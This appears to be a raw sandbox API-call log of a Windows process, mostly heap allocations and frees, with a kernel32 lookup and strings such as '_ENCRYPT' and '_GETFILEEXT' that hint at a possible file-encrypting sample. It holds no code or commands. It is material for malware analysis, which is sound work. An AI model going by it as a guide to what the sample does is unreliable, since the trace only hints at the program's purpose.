lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0158.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0158.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0158.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0158.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0158.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0158.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0158.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0158.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0158.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0158.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0158.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0158.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0158.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0158.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0158.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0158.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0158.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0158.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0158.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0158.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0158.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0158.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0158.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0158.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0158.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0158.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0158.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0158.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0158.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0158.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0158.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0158.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0158.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.006] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0158.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0158.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0158.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0158.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0158.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0158.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0158.007] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0158.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0158.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0158.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0158.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0158.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0158.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0158.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0158.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0158.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0158.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0158.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0158.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0158.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0158.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0158.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0158.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0158.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0158.008] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0158.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0158.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0158.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0158.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0158.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0158.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0158.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0158.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0158.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0158.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0158.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0158.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0158.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0158.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0158.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0158.008] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0158.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0158.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0158.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0158.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba120, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0158.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0158.009] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0158.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0158.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0158.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0158.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0158.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0158.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0158.009] CloseHandle (hObject=0x138) returned 1 [0158.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0158.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0158.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0158.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0158.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0158.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0158.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0158.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0158.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0158.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0158.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0158.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0158.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0158.010] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0158.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0158.010] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0158.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0158.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0158.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0158.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0158.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0158.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0158.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0158.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0158.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0158.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0158.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0158.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0158.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0158.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0158.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0158.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0158.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0158.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0158.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0158.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0158.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0158.012] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0158.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0158.012] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0158.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0158.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0158.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1930 [0158.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0158.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0158.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0158.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0158.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0158.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0158.013] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0158.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0158.013] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0158.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 